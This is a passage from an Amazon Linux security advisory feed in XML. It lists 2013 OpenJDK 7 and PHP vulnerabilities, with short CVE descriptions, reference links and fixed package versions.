Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2457:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2456:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2455:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2454:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2453:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2452:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2450:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2449:
It was discovered that GnomeFileTypeDetector did not check for read permissions when accessing files. An untrusted Java application or applet could possibly use this flaw to disclose potentially sensitive information.
CVE-2013-2448:
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2013-2447:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2446:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2445:
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine.
CVE-2013-2444:
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service.
CVE-2013-2443:
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information.
CVE-2013-2412:
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information.
CVE-2013-2407:
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service.
CVE-2013-1571:
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation.
CVE-2013-1500:
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1500" title="" id="CVE-2013-1500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1571" title="" id="CVE-2013-1571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2407" title="" id="CVE-2013-2407" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2412" title="" id="CVE-2013-2412" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2443" title="" id="CVE-2013-2443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2444" title="" id="CVE-2013-2444" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2445" title="" id="CVE-2013-2445" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2446" title="" id="CVE-2013-2446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2447" title="" id="CVE-2013-2447" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2448" title="" id="CVE-2013-2448" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2449" title="" id="CVE-2013-2449" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2450" title="" id="CVE-2013-2450" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2452" title="" id="CVE-2013-2452" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2453" title="" id="CVE-2013-2453" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2454" title="" id="CVE-2013-2454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2455" title="" id="CVE-2013-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2456" title="" id="CVE-2013-2456" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2457" title="" id="CVE-2013-2457" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2458" title="" id="CVE-2013-2458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2459" title="" id="CVE-2013-2459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2460" title="" id="CVE-2013-2460" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2461" title="" id="CVE-2013-2461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2463" title="" id="CVE-2013-2463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2465" title="" id="CVE-2013-2465" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2469" title="" id="CVE-2013-2469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2470" title="" id="CVE-2013-2470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2471" title="" id="CVE-2013-2471" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2472" title="" id="CVE-2013-2472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2473" title="" id="CVE-2013-2473" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0957.html" title="" id="RHSA-2013:0957" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.29.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.29.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.25" release="2.3.10.3.29.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-205</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-205: critical priority package update for php</title><issued date="2013-06-24 13:48:00" /><updated date="2014-09-15 23:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2110:
964969:
CVE-2013-2110 php: Heap-based buffer overflow in quoted_printable_encode()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110" title="" id="CVE-2013-2110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-xml" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-snmp" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-enchant" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-enchant-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.26" release="1.0.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.26-1.0.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-enchant" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-enchant-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.26-1.0.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.26" release="1.0.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.26-1.0.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-206</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-206: critical priority package update for php54</title><issued date="2013-06-24 13:48:00" /><updated date="2014-09-15 23:14:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2110:
964969:
CVE-2013-2110 php: Heap-based buffer overflow in quoted_printable_encode()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2110" title="" id="CVE-2013-2110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-process" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.16" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.16-1.37.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.16" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.16-1.37.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.16" release="1.37.amzn1" epoch="0" 